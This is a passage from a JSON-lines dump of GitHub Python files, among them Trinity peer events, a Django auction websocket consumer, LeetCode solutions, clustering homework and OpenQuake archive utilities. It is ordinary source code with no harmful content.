return self._remote\n\n\nclass PeerCountResponse(BaseEvent):\n \"\"\"\n Response event that wraps the count of peers connected to the pool.\n \"\"\"\n\n def __init__(self, peer_count: int) -> None:\n self.peer_count = peer_count\n\n\nclass PeerCountRequest(BaseRequestResponseEvent[PeerCountResponse]):\n \"\"\"\n Request event to get the count of peers connected to the pool.\n \"\"\"\n\n @staticmethod\n def expected_response_type() -> Type[PeerCountResponse]:\n return PeerCountResponse\n\n\nclass DisconnectPeerEvent(HasRemoteEvent):\n \"\"\"\n Event broadcasted when we want to disconnect from a peer\n \"\"\"\n\n def __init__(self, remote: Node, reason: DisconnectReason) -> None:\n self._remote = remote\n self.reason = reason\n\n @property\n def remote(self) -> Node:\n return self._remote\n\n\nclass PeerPoolMessageEvent(HasRemoteEvent):\n \"\"\"\n Base event for all peer messages that are relayed on the event bus. The events are mapped\n to individual subclasses for every different ``cmd`` to allow efficient consumption through\n the event bus.\n \"\"\"\n\n def __init__(self, remote: Node, cmd: Command, msg: PayloadType) -> None:\n self._remote = remote\n self.cmd = cmd\n self.msg = msg\n\n @property\n def remote(self) -> Node:\n return self._remote\n","repo_name":"teknomise/trinity","sub_path":"trinity/protocol/common/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"23359406867","text":"import json\nimport os\n\nimport django\nimport requests\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"tender_hack_back.settings\")\ndjango.setup()\n\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom competence.models import CompanyQuotationSession, Company, QuotationSession\nfrom session_emulator.models import Lot\n\n\n@database_sync_to_async\ndef create_lot(company_id: int, session: int, prise: int):\n company = Company.objects.get(id=company_id)\n quotation_session = QuotationSession.objects.get(id=session)\n quotation_session.current_price = prise\n quotation_session.save(update_fields=[\"current_price\"])\n comp_quotation_session = CompanyQuotationSession.objects.get_or_create(\n company=company, quotation_session=quotation_session, is_bot=False\n )\n if CompanyQuotationSession.is_bot:\n r = requests.get(\"http://127.0.0.1:5000/\")\n dat = r.json()[\"push_lot_prediction\"]\n if dat:\n Lot.objects.create(\n comp_quotation_session=comp_quotation_session[0], price=prise * 0.99\n )\n return prise * 0.99, quotation_session.company.id\n return None, None\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.room_name = self.scope[\"url_route\"][\"kwargs\"][\"room_name\"]\n self.room_group_name = \"chat_%s\" % self.room_name\n\n # Join room group\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave room group\n await self.channel_layer.group_discard(self.room_group_name, self.channel_name)\n\n # Receive message from WebSocket\n async def receive(self, text_data):\n data = text_data.split(\" \")\n company_id = int(data[0])\n lot = float(data[1])\n company2_id = int(data[2])\n session = self.room_group_name.split(\"_\")[1]\n prise, company3_id = await create_lot(company_id, int(session), lot)\n if prise:\n mes = [lot, prise]\n else:\n mes = [lot]\n # Send message to room group\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"chat_message\",\n \"message\": mes,\n \"company_id\": company_id,\n \"company2_id\": company2_id,\n \"company3_id\": company3_id,\n },\n )\n\n # Receive message from room group\n async def chat_message(self, event):\n message = event[\"message\"]\n company_id = event[\"company_id\"]\n company2_id = event[\"company2_id\"]\n company3_id = event[\"company3_id\"]\n\n # Send message to WebSocket\n await self.send(\n text_data=json.dumps(\n {\n \"lot\": message,\n \"bot\": False,\n \"company\": company_id,\n \"company2\": company2_id,\n \"company3\": company3_id,\n }\n )\n )\n","repo_name":"Alexander-D-Karpov/tender_hack_back","sub_path":"session_emulator/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10789165835","text":"# Time: O(n)\n# Space: O(n)\n\nclass Solution(object):\n def numDifferentIntegers(self, word):\n \"\"\"\n :type word: str\n :rtype: int\n \"\"\"\n result, num = set(), None\n for i in xrange(len(word)+1):\n c = word[i] if i < len(word) else ' '\n if c.isdigit():\n num = 10*num+int(c) if num is not None else int(c)\n elif num is not None:\n result.add(num)\n num = None\n return len(result)\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/number-of-different-integers-in-a-string.py","file_name":"number-of-different-integers-in-a-string.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"7540592719","text":"def get_func(number, length):\n if number >= length:\n return number - length\n return number\n\nfrom typing import List\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n n = nums\n l, r = 0, len(nums)-1\n max_value = max(n[l], n[r])\n max_value_idx = l if n[l] > n[r] else r\n\n # 최대값 찾기\n while l <= r:\n m = (l+r)//2\n if n[l] > max(n[m], n[r]):\n if n[l] > max_value:\n max_value = n[l]\n max_value_idx = l\n r = m-1\n else:\n if n[m] > n[r] and n[m] > max_value:\n max_value = n[m]\n max_value_idx = m\n elif n[m] < n[r] and n[r] > max_value:\n max_value = n[r]\n max_value_idx = r\n l = m+1\n\n # 최대값부터 2배해서 찾기\n l = max_value_idx + 1\n r = max_value_idx + len(nums)\n\n while l <= r:\n m = (l+r)//2\n ml = get_func(m, len(nums))\n if n[ml] == target:\n return ml\n elif n[ml] < target:\n l = m+1\n else:\n r = m-1\n return -1\n\n\nprint(Solution().search([4,5,6,7,0,1,2],0))\n# print(Solution().search([1],0))\n# print(Solution().search([1,3],1))\n# print(Solution().search([3,1],0))\n","repo_name":"chickenchickenlove/leetcode","sub_path":"medium/lc33.py","file_name":"lc33.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22188422814","text":"from .. import Channel\nfrom .config import API, CHANNEL, READ_KEY, WRITE_KEY, FIELDS, DEST_URL\nimport simplejson as json\nimport random\n\n\nclass TestPySpeak:\n\n def setup(self):\n self.test_channel = Channel(\n CHANNEL, DEST_URL, API, READ_KEY, WRITE_KEY)\n self.updates = dict()\n\n def generate_random_update_values(self):\n for field in FIELDS:\n self.updates[field] = random.randint(1, 100)\n\n def test_get_channel_feed_is_dictionary(self):\n test_channel_feed = self.test_channel.get_channel_feed()\n assert ((type(test_channel_feed) == dict)\n & (len(test_channel_feed) > 0))\n\n def test_get_field_feed_is_dictionary(self):\n test_field_feed = self.test_channel.get_field_feed('field2')\n assert ((type(test_field_feed) == dict)\n & (len(test_field_feed) > 0))\n\n def test_update_and_read_channel(self):\n self.generate_random_update_values()\n self.test_channel.update_channel(self.updates)\n test_json = self.test_channel.get_channel_feed(last_entry=True)\n\n for field in FIELDS:\n assert(int(test_json[field]) == self.updates[field])\n\n def test_update_and_read_field(self):\n self.generate_random_update_values()\n self.test_channel.update_channel(self.updates)\n for field in FIELDS:\n test_json = self.test_channel.get_field_feed(\n field, last_entry=True)\n assert(int(test_json[field]) == self.updates[field])\n\n def test_post_pyspeak_data(self):\n self.generate_random_update_values()\n self.test_channel.update_channel(self.updates)\n source_response = json.dumps(self.test_channel.get_channel_feed())\n dest_response = self.test_channel.post_data()\n assert(dest_response.json()['form']['json_data'] == source_response)\n","repo_name":"raddevon/pyspeak","sub_path":"pyspeak/tests/test_channel.py","file_name":"test_channel.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"16810523862","text":"from django.shortcuts import render\nfrom django.utils.translation import ugettext as _\n\n\n# pylint: disable=unused-argument\ndef handler400(request, exception):\n ctx = {'code': 400, 'title': _('Bad request'),\n 'message': _('There was an error in your request.')}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 400\n return response\n\n # pylint: disable=unused-argument\ndef handler403(request, exception):\n ctx = {'code': 403, 'title': _('Forbidden'),\n 'message': _(\"You don't have the permission to access this page.\")}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 403\n return response\n\n # pylint: disable=unused-argument\ndef handler404(request, exception):\n ctx = {'code': 404, 'title': _('Page not found'),\n 'message': _('The page you requested could not be found.')}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 404\n return response\n\n # pylint: disable=unused-argument\ndef handler500(request):\n ctx = {'code': 500, 'title': _('Internal Server Error'),\n 'message': _('An unexpected error has occurred.')}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 500\n return response\n\n # pylint: disable=unused-argument\ndef csrf_failure(request, reason):\n return render(request, 'error_handler/csrf_failure.html')\n","repo_name":"digitalfabrik/coldaid-backend","sub_path":"src/cms/views/error_handler/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"12382277986","text":"def merge(intervals: list[list[int]]) -> list[list[int]]:\n result = []\n print(sorted(intervals))\n\n for interval in sorted(intervals):\n # print(interval)\n # print(type(interval))\n if result and interval[0] <= result[-1][1]:\n result[-1][1] = max(result[-1][1], interval[1])\n\n else:\n # print(type(interval))\n result.append(interval)\n\n return result\n\n\nprint(merge([[1, 3], [2, 6], [8, 10], [15, 18]]))\n","repo_name":"leeseungsoo0701/python_alogrithm","sub_path":"Sort/QuickSort/leetcode/59_구간병합.py","file_name":"59_구간병합.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18048297773","text":"eipservice_config_spec = {}\n\neipservice_config_spec['1'] = {\n 'description': 'sample eip service config',\n 'type': 'object',\n 'properties': {\n 'serial': {\n 'type': int,\n 'default': 1,\n 'required': [\"True\"]\n },\n 'version': {\n 'type': int,\n 'default': 1,\n 'required': [\"True\"]\n },\n 'clusters': {\n 'type': list,\n 'default': [\n {\"label\": {\n \"en\": \"Location Unknown\"},\n \"name\": \"location_unknown\"}]\n },\n 'gateways': {\n 'type': list,\n 'default': [\n {\"capabilities\": {\n \"adblock\": True,\n \"filter_dns\": True,\n \"ports\": [\"80\", \"53\", \"443\", \"1194\"],\n \"protocols\": [\"udp\", \"tcp\"],\n \"transport\": [\"openvpn\"],\n \"user_ips\": False},\n \"cluster\": \"location_unknown\",\n \"host\": \"location.example.org\",\n \"ip_address\": \"127.0.0.1\"}]\n },\n 'locations': {\n 'type': dict,\n 'default': {}\n },\n 'openvpn_configuration': {\n 'type': dict,\n 'default': {\n \"auth\": None,\n \"cipher\": None,\n \"tls-cipher\": None}\n }\n }\n}\n\n\ndef get_schema(version):\n \"\"\"\n Returns the schema corresponding to the version given.\n\n :param version: the version of the schema to get.\n :type version: str\n :rtype: dict or None if the version is not supported.\n \"\"\"\n schema = eipservice_config_spec.get(version, None)\n return schema\n","repo_name":"leapcode/bitmask_client","sub_path":"src/leap/bitmask/services/eip/eipspec.py","file_name":"eipspec.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"40"} +{"seq_id":"9880276710","text":"# Program to determine whether a year is a leap year or not.\r\n# Name: Buhlebezwe\r\n# Student Number: MBLBUH001\r\n# Date: 08 March 2014\r\n\r\nx = eval(input(\"Enter a year:\\n\"))\r\n\r\nif(x%400==0) or (x%4==0) and (x%100!=0):\r\n print(x,\"is a leap year.\")\r\nelse:\r\n print(x, \"is not a leap year.\")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/mblbuh001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5660051441","text":"#!/usr/bin/python\nimport os\nOUTPUT_FILENAME = \"data/graph.dzn\"\n\ndef read_nodes(edge, parse_edges):\n ed = [int(x) for x in edge.split()]\n parse_edges[ed[0]].append(ed[1])\n parse_edges[ed[1]].append(ed[0])\n\n\ndef parse_graph(initial_graph):\n try:\n global V\n os.makedirs(os.path.dirname(OUTPUT_FILENAME), exist_ok=True)\n fp = open(f\"{initial_graph}\",'r',encoding = 'utf-8')\n V = fp.readline().strip()\n while(V[0] == \"#\"): \n V = fp.readline().strip() \n E = fp.readline().strip()\n edges = fp.readlines()\n \n graph = open(f\"{OUTPUT_FILENAME}\",'w',encoding = 'utf-8')\n graph.write(f\"V={V};\\n\")\n #graph.write(f\"E={E};\\n\")\n \n global parse_edges\n parse_edges = {List: [] for List in range(1, int(V)+1) } \n for edge in edges: \n read_nodes(edge, parse_edges)\n \n max_len = int(len(max(parse_edges.values(), key=len)))\n graph.write(f\"MAXLEN={max_len};\\n\")\n graph.write(f\"EDGES=[|\\n\") \n for key, value in parse_edges.items():\n filler = 0;\n for e in value:\n if(value.index(e) == max_len-1):\n graph.write(f\"{e}\")\n else:\n graph.write(f\"{e}, \")\n filler += 1\n \n while(filler < max_len and len(value) < max_len):\n if (filler == max_len -1 ):\n graph.write(f\"0\")\n else: \n graph.write(f\"0, \")\n filler += 1\n \n if (key == len(parse_edges)):\n graph.write('|];\\n')\n else:\n graph.write('|\\n')\n\n finally: \n fp.close()\n graph.close()\n return f\"{OUTPUT_FILENAME}\"\n","repo_name":"diogorainhalopes/SearchAndPlanning-22-23","sub_path":"parse_graph.py","file_name":"parse_graph.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23015893867","text":"'''Test file when users wpm updates'''\nfrom collections import OrderedDict\nimport os\nimport sys\nimport unittest\nsys.path.append(os.path.abspath('../'))\nimport app\n\n\nKEY_INPUT1 = \"input\"\nKEY_EXPECTED = \"expected\"\n\n\nclass UserUpdateTest(unittest.TestCase):\n '''Test class to check update_player_stats function works correctly'''\n def setUp(self):\n self.success_test_params = [{\n KEY_INPUT1: [[150, 1841], [3, 20]],\n KEY_EXPECTED: [50, 92.05]\n }, {\n KEY_INPUT1: [[65, 34, 175], [1, 2, 2]],\n KEY_EXPECTED: [65, 17, 87.5]\n }, {\n KEY_INPUT1: [[3451, 1475, 2471, 0], [28, 14, 30, 0]],\n KEY_EXPECTED: [123.25, 105.36, 82.37, 0]\n }, {\n KEY_INPUT1: [[3451, 1475, 2471, 0], [28, 14, 30, 0]],\n KEY_EXPECTED: [123.25, 105.36, 82.37, 0]\n }]\n\n def tests_update_player_stats_success(self):\n '''Test function to check all the players wpm updates appropriately'''\n for test in self.success_test_params:\n totalwpm, totalgames = (test[KEY_INPUT1])\n actual_result = app.find_average(totalwpm, totalgames)\n expected_result = test[KEY_EXPECTED]\n print(\"Success\", actual_result, expected_result)\n\n self.assertEqual(len(actual_result), len(expected_result))\n self.assertEqual(actual_result, expected_result)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Beat-The-Keys/BeatTheKeys","sub_path":"server/find_average_test.py","file_name":"find_average_test.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"5332110786","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, classification_report, confusion_matrix\n\n\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.cluster import DBSCAN\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport time\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn import tree\n\n\n\n\n\ndef k_means_clustering():\n datasetlist = [\"datos_1.csv\",\"datos_2.csv\",\"datos_3.csv\"]\n names = []\n i = 0\n for element in datasetlist:\n names.append(datasetlist[i].replace(\".csv\",\"\"))\n i = i + 1\n j = 0\n for dataset in datasetlist:\n dataset = pd.read_csv(dataset)\n for i in range(1,6): # 1 through 5 clusters\n k_means(i,dataset,names[j])\n j = j + 1\n\n\ndef k_means(number_of_clusers, dataset,datasetname):\n #Kmeans\n kmeans = KMeans(n_clusters=number_of_clusers)\n labels = kmeans.fit_predict(dataset)\n\n #Get Centroids\n centroids = kmeans.cluster_centers_\n plt.scatter(dataset['x'], dataset['y'], c=kmeans.labels_.astype(float), s=10, alpha=0.5)\n plt.scatter(centroids[:, 0], centroids[:, 1], s=80, color='k')\n\n #plt.savefig(r\"C:\\Users\\Burni\\Desktop\\Tarea-2_SistemasInteligentes\\kmeans\"+\"\\k_means_\"+str(datasetname)+\"_clusters\"+str(number_of_clusers))\n plt.savefig(\"Kmeans\\\\\"+str(datasetname)+\"_clusters\"+str(number_of_clusers))\n plt.cla()\n plt.clf()\n\ndef agglomerative_clustering():\n datasetlist = [\"datos_1.csv\", \"datos_2.csv\", \"datos_3.csv\"]\n names = []\n i = 0\n for element in datasetlist:\n names.append(datasetlist[i].replace(\".csv\", \"\"))\n i = i + 1\n j = 0\n for dataset in datasetlist:\n dataset = pd.read_csv(dataset)\n for i in range(1, 6): # 1 through 5 clusters\n agglomerative(i, None, dataset, names[j])\n distances = [0.25,0.50,0.75,1.0,1.5]\n for distance in distances:\n agglomerative(None,distance,dataset,names[j])\n j = j + 1\n\n\ndef agglomerative(number_of_clusters,distance,dataset,datasetname):\n save_location = \"\"\n if distance is None: #With clusters\n # Agglomerative Clustering \"Ward\"\n cluster = AgglomerativeClustering(n_clusters=number_of_clusters, affinity='euclidean', linkage='ward')\n cluster.fit_predict(dataset)\n save_location = \"Agglomerative Clustering\\\\\"+str(datasetname)+\"_clusters\"+str(number_of_clusters)\n else: #With distances\n # Agglomerative Clustering \"Ward:\n cluster = AgglomerativeClustering(n_clusters=None, distance_threshold=distance,affinity='euclidean',linkage=\"ward\")\n cluster.fit_predict(dataset)\n distance = str(distance).replace(\".\",\"_\")\n save_location = \"Agglomerative Clustering\\\\\" + str(datasetname) + \"_distance_\"+str(distance)\n plt.scatter(dataset['x'], dataset['y'], c=cluster.labels_, cmap='rainbow')\n plt.savefig(save_location)\n plt.cla()\n plt.clf()\n\ndef DBScan():\n datasetlist = [\"datos_1.csv\", \"datos_2.csv\", \"datos_3.csv\"]\n names = []\n i = 0\n for element in datasetlist:\n names.append(datasetlist[i].replace(\".csv\", \"\"))\n i = i + 1\n i = 0\n for dataset in datasetlist:\n dataset = pd.read_csv(dataset)\n neighbors_distance = [0.25,0.35,0.5]\n min_samples = [5, 10, 15]\n for distance in neighbors_distance: # 1 through 5 clusters\n for sample in min_samples:\n DB(distance,sample,dataset,names[i])\n #agglomerative(None, distance, dataset, names[j])\n i = i + 1\n\ndef DB(distance_between_neighbors, min_samples_neighborhood, dataset, datasetname):\n #Db Scan\n label = DBSCAN(eps=distance_between_neighbors, min_samples=min_samples_neighborhood).fit(dataset)\n #core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n #core_samples_mask[db.core_sample_indices_] = True\n labels = label.labels_\n\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n\n\n #no_clusters = len(dataset.unique(labels))\n #no_noise = np.sum(dataset.array(labels) == -1, axis=0)\n plt.scatter(dataset['x'], dataset['y'], c=label.labels_)\n\n distance_between_neighbors = str(distance_between_neighbors).replace(\".\",\"_\")\n save_location = \"DBScan\\\\\"+str(datasetname)+\"_eps_\"+str(distance_between_neighbors)+\"_min_s_\"+str(min_samples_neighborhood)\n plt.savefig(save_location)\n plt.cla()\n plt.clf()\n\n\n\n\ndef knn():\n kays = [1,3,5,7,9,11,13,15]\n for k in kays:\n Ejercicio2(k)\n\ndef Ejercicio2(k):\n dataset = pd.read_csv(\"genero_peliculas_training.csv\")\n\n X = dataset.iloc[:, :-1]\n y = dataset.iloc[:, 10]\n labelEncoder_X = LabelEncoder()\n X = X.apply(LabelEncoder().fit_transform)\n Knn = KNeighborsClassifier(n_neighbors=k).fit(X,y)\n\n testing_dataset = pd.read_csv(\"genero_peliculas_testing.csv\")\n X2 = testing_dataset.iloc[:, :-1]\n X2 = X2.apply(LabelEncoder().fit_transform)\n y2 = testing_dataset.iloc[:, 10]\n\n start = time.time()\n y_pred = Knn.predict(X2)\n prediction_time = time.time() - start\n print(\"Analitics for: \"+\"on k: \"+str(k))\n\n print(\"\\n\")\n print(\"Prediction Time: \" + str(prediction_time))\n print(confusion_matrix(y2, y_pred, ))\n print(classification_report(y2, y_pred, zero_division=\"warn\"))\n\ndef decisicion_tree():\n modes = [\"gini\",\"entropy\"]\n max_depths = [2,3,4,5,None]\n for mode in modes:\n for max_depth in max_depths:\n Ejercicio3(mode,max_depth)\n\ndef Ejercicio3(mode, max_depth):\n dataset = pd.read_csv(\"genero_peliculas_training.csv\")\n\n\n #print(dataset)\n X = dataset.iloc[:, :-1]\n #print(\"X will be\")\n #print(X)\n y = dataset.iloc[:,10]\n #print(\"Y will be\")\n #print(y)\n\n labelEncoder_X = LabelEncoder()\n X = X.apply(LabelEncoder().fit_transform)\n #print(X)\n\n clf = DecisionTreeClassifier(criterion=mode,max_depth=max_depth).fit(X,y)\n testing_dataset = pd.read_csv(\"genero_peliculas_testing.csv\")\n X2 = testing_dataset.iloc[:, :-1]\n X2 = X2.apply(LabelEncoder().fit_transform)\n y2 = testing_dataset.iloc[:,10]\n #print(X2)\n #print(y2)\n start = time.time()\n y_pred = clf.predict(X2)\n prediction_time = time.time() - start\n print(\"Analitics for: \"+mode+\" on depth: \"+str(max_depth))\n print(\"Prediction Time: \"+str(prediction_time))\n\n print(\"\\n\")\n\n print(confusion_matrix(y2,y_pred,))\n print(classification_report(y2, y_pred, zero_division=\"warn\"))\n\n\n\n\nmenu = True\nwhile menu:\n print(\"*****Menu*****\")\n print(\"*Ejercicio 1*\")\n print(\"1. Kmeans.\")\n print(\"2. Agglomerative Clustering.\")\n print(\"3. DBScan.\")\n print(\"*Ejercicio 2*\")\n print(\"4. Knn\")\n print(\"*Ejercicio 3*\")\n print(\"5. Decision Tree Classifier.\")\n selection = int(input(\"Ingrese su eleccion: \"))\n if selection == 1:\n k_means_clustering()\n print(\"Output guardado en la carpeta Kmeans.\")\n elif selection == 2:\n agglomerative_clustering()\n print(\"Output guardado en la carpeta Agglomerative Clustering.\")\n elif selection == 3:\n DBScan()\n print(\"Output guardado en la carpeta DBScan.\")\n elif selection == 4:\n knn()\n elif selection == 5:\n decisicion_tree()\n\n else:\n menu = False\n\n\n\n'''\n accuracy = accuracy_score(y2, y_pred)\n print(\"Accuracy: \"+str(accuracy))\n the_average = \"micro\"\n precision = precision_score(y2, y_pred, average=the_average)\n print(\"Precision: \"+str(precision))\n recall = recall_score(y2, y_pred, average=the_average)\n print(\"Recall: \"+str(recall))\n f_score = f1_score(y2, y_pred, average=the_average)\n print(\"F1-Score: \"+str(f_score))\n'''","repo_name":"Kenneth11741149/Tarea-2_SistemasInteligentes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20544362135","text":"import os\nimport csv\nimport inspect\nimport zipfile\nimport StringIO\nimport tempfile\nfrom abc import ABCMeta, abstractmethod\n\nfrom openquake.nrmllib import InvalidFile\nfrom openquake.nrmllib.node import node_to_nrml, node_from_nrml\nfrom openquake.commonlib.record import Table\nfrom openquake.commonlib import record, records, converter\n\n\nclass FileWrapper(object):\n \"\"\"\n Mixin class providing a file-like interface to the underlying\n .fileobj.\n \"\"\"\n def __iter__(self):\n return self\n\n def next(self):\n return self.fileobj.next()\n\n def readline(self):\n return self.fileobj.readline()\n\n def read(self, n=-1):\n return self.fileobj.read(n)\n\n def write(self, data):\n self.fileobj.write(data)\n\n def flush(self):\n self.fileobj.flush()\n\n def close(self):\n self.fileobj.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, etype, exc, tb):\n self.close()\n\n\nclass FileObject(FileWrapper):\n \"\"\"\n A named reusable StringIO for reading and writing, useful for the tests\n \"\"\"\n def __init__(self, name, bytestring):\n self.name = name\n self.bytestring = bytestring\n self.fileobj = StringIO.StringIO(bytestring)\n\n def close(self):\n data = self.fileobj.getvalue()\n self.fileobj.close()\n self.fileobj = StringIO.StringIO(data)\n\n\nclass NotInArchive(Exception):\n \"\"\"Raised when trying to open a non-existing file in the archive\"\"\"\n\n\nclass Archive(object):\n \"\"\"\n Abstract Base Class for Archive classes. Subclasses must override\n the methods ``_open`` and ``extract_filenames``.\n \"\"\"\n __metaclass__ = ABCMeta\n\n opened = []\n\n def open(self, name, mode='r'):\n f = self._open(name, mode)\n self.opened.add(f)\n return f\n\n @abstractmethod\n def _open(self, name, mode):\n pass\n\n @abstractmethod\n def extract_filenames(self, prefix=''):\n pass\n\n def close(self):\n for f in self.opened:\n f.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, etype, exc, tb):\n self.close()\n\n def __repr__(self):\n return '<%s %s>' % (self.__class__.__name__, self.extract_filenames())\n\n def __contains__(self, name):\n \"\"\"Check if a name is contained in the archive\"\"\"\n try:\n self.open(name, 'r').close()\n except:\n return False\n else:\n return True\n\n\n# Writing directly to a zip archive is not possible because .writestr\n# adds a new object every time it is called, so you cannot work line-by-line.\n# The solution is to write to a temporary file and then push it into the\n# archive at closing time\nclass TempFile(FileWrapper):\n \"\"\"\n Wrapper over a NamedTemporaryFile to be used in conjunction with\n ZipArchive objects. It automatically stores the data in the archive\n at file closing time.\n \"\"\"\n def __init__(self, arczip, arcname, mode):\n self.arczip = arczip\n self.name = arcname\n self.fileobj = tempfile.NamedTemporaryFile(mode)\n self.tempname = self.fileobj.name\n self.closed = False\n\n def close(self):\n if self.closed: # already closed, do nothing\n return\n self.fileobj.seek(0) # this is essential\n self.arczip.write(self.tempname, self.name) # save in the archive\n self.fileobj.close() # remove the temporary file\n self.closed = True\n\n\nclass ZipArchive(Archive):\n \"\"\"\n Thin wrapper over a ZipFile object.\n \"\"\"\n def __init__(self, zipname, mode='a'):\n self.zip = zipfile.ZipFile(zipname, mode)\n self.name = self.zip.filename\n self.opened = set()\n\n def _open(self, name, mode):\n if mode in ('w', 'w+', 'r+'):\n # write on a temporary file\n return TempFile(self.zip, name, mode)\n else:\n # open for reading\n return self.zip.open(name, mode)\n\n def extract_filenames(self, prefix=''):\n \"\"\"\n Return the file objects in the archive with the given prefix\n \"\"\"\n return set(i.filename for i in self.zip.infolist()\n if i.filename.startswith(prefix))\n\n\nclass DirArchive(Archive):\n \"\"\"\n Provides an archive interface over a filesystem directory\n \"\"\"\n def __init__(self, dirname, mode='r'):\n self.name = dirname\n self.mode = mode\n if mode in ('w', 'w+', 'r+') and not os.path.exists(dirname):\n os.mkdir(dirname)\n else:\n assert os.path.exists(dirname), dirname\n self.opened = set()\n\n def _open(self, name, mode):\n return open(os.path.join(self.name, name), mode)\n\n def extract_filenames(self, prefix=''):\n \"\"\"\n Return the file objects in the archive with the given prefix\n \"\"\"\n return [f for f in os.listdir(self.name) if f.startswith(prefix)]\n\n\nclass MemArchive(Archive):\n \"\"\"\n Provides an archive interface over FileObjects in memory\n \"\"\"\n def __init__(self, items, mode='r'):\n self.dic = {}\n for name, csvstr in items:\n self.add(name, csvstr)\n self.opened = set()\n\n def add(self, name, csvstr):\n self.dic[name] = FileObject(name, csvstr)\n\n def _open(self, name, mode='r'):\n if mode in ('w', 'w+', 'r+'):\n self.dic[name] = f = FileObject(name, '')\n return f\n try:\n return self.dic[name]\n except KeyError:\n raise NotInArchive(name)\n\n def extract_filenames(self, prefix=''):\n \"\"\"\n Return the file objects in the archive with the given prefix\n \"\"\"\n return [f for f in self.dic if f.startswith(prefix)]\n\n\ndef mkarchive(pathname, mode):\n \"\"\"\n Return a ZipArchive or a DirArchive depending on the pathname extension\n \"\"\"\n if pathname.endswith('.zip'):\n return ZipArchive(pathname, mode)\n else:\n return DirArchive(pathname, mode)\n\n\n# used in the tests\ndef create_table(recordtype, csvstr):\n \"\"\"\n Given a record class and a csv UTF8-encoded string, returns\n a Table object.\n \"\"\"\n name = '__' + recordtype.__name__ + '.csv'\n archive = MemArchive([(name, csvstr)])\n man = CSVManager(archive, has_header=False)\n reclist = list(man.read(recordtype))\n return Table(recordtype, reclist)\n\n\nclass MultipleManagerError(Exception):\n \"\"\"\n Raised when it is not possible to extract a single manager\n from an archive of CSV files (i.e. there more than one common\n prefix).\n \"\"\"\n\n\nclass CSVManager(object):\n \"\"\"\n A class to manage CSV files stored in an Archive object.\n The file names must be of the form __.csv\n where is the name of the record class describing\n the structure of the file. For instance an archive could contain\n the files\n\n vulnerability-model-discrete__DiscreteVulnerability.csv\n vulnerability-model-discrete__DiscreteVulnerabilityData.csv\n vulnerability-model-discrete__DiscreteVulnerabilitySet.csv\n\n then the method .convert_to_node() would convert the files\n into a Node object by using the appropriate converter and\n the method .convert_to_nrml() would generate an XML file\n named vulnerability-model-discrete.xml in the archive.\n Viceversa, starting from an empty archive and a file named\n vulnerability-model-discrete.xml, it is possible to generate\n the CSV files by calling\n\n CSVManager(archive).convert_from_nrml()\n \"\"\"\n convertertype = converter.Converter\n\n def __init__(self, archive, prefix='', has_header=True):\n self.archive = archive\n self.prefix = prefix\n self.has_header = has_header\n self.rt2reader = {}\n self.rt2writer = {}\n self.rt2file = {}\n\n def _getmanagers(self):\n \"\"\"\n Returns a list of managers, one for each file group in the\n underlying archive. Each manager has its own converter class.\n \"\"\"\n managers = {} # name->manager dictionary\n ct = {} # converter name -> converter type dictionary\n for name, value in vars(converter).iteritems():\n if inspect.isclass(value) and 